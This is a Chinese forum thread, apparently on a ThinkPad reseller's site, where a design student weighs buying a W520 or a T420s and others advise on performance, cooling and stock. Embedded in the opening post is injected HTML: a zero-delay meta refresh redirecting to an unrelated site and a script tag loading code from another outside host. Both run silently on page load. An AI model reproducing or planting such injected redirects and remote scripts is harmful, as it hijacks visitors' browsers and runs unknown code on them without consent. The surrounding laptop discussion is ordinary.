开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

咨询关于w520 和t420s 准备近期入手

本人还是在校学生,学设计的 平时主要用到3dmax rhino solidworks ps还有一些视频软件偶尔会用用。现在手上两年前的本每次作图跑的我泪流满面。决心换本 。之前想换高配t420S 前前后后看 看了些论坛评测完全抵不住w520诱惑。但是w520价格买了手头就吃紧了 。。咬咬牙还是能买的  但是还是学生啊,,,经济来源大多都是家里供的 真心不想浪费。  请教各位大大给点建议 ...

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

3L还是我的
标题不够长????
欢迎楼主,看你对什么更看重了,便携考虑T420s,追求笔记本中的极致性能就考虑W520吧
都能满足楼主要求
不经常搬来搬去就w520
学生一族 还是注重性能吧. 果断选择W520
EddieFan 发表于 2012-2-4 18:17
欢迎楼主,看你对什么更看重了,便携考虑T420s,追求笔记本中的极致性能就考虑W520吧 ...

您好 请问1000m 和2000m 是不是 真的像评测那样说差了一半的性能?? 还有店里近期会不会又w520的促销啊?
clg176 发表于 2012-2-4 20:41
都能满足楼主要求

这个最虐心。。。选择无能
babeltree 发表于 2012-2-4 21:27
不经常搬来搬去就w520

恩 基本上不需要搬动 都是寝室用....
tszmsid 发表于 2012-2-4 22:11

请问w520 和T420s 散热是不是差不多的?
W系列的好一些
ls正解.
我也是学生,还是420吧。
sudongbo 发表于 2012-2-6 14:57
我也是学生,还是420吧。

420用着散热怎样?  作图渲染怎样? 我现在的本已经卡的不行..
tszmsid 发表于 2012-2-4 22:11

请问3ju  有没有现货啊??  我看价目上是在预定  何时有现货?
可以预定. 2天左右到.
过几天还会到一款W510 价格也不错 lz可以关注一下
yangjichiyu 发表于 2012-2-6 22:39
420用着散热怎样?  作图渲染怎样? 我现在的本已经卡的不行..

我也没买呢?

在日常使用中,w520和t420还有t420s的风扇噪音怎么样?
风扇很少转的。。。除非你整天拿它玩游戏
我觉得如果预算够,又不嫌重,520好
散热还是不错的
果断520吧
我要是你就买520,420散热不好,你上网查查就知道了。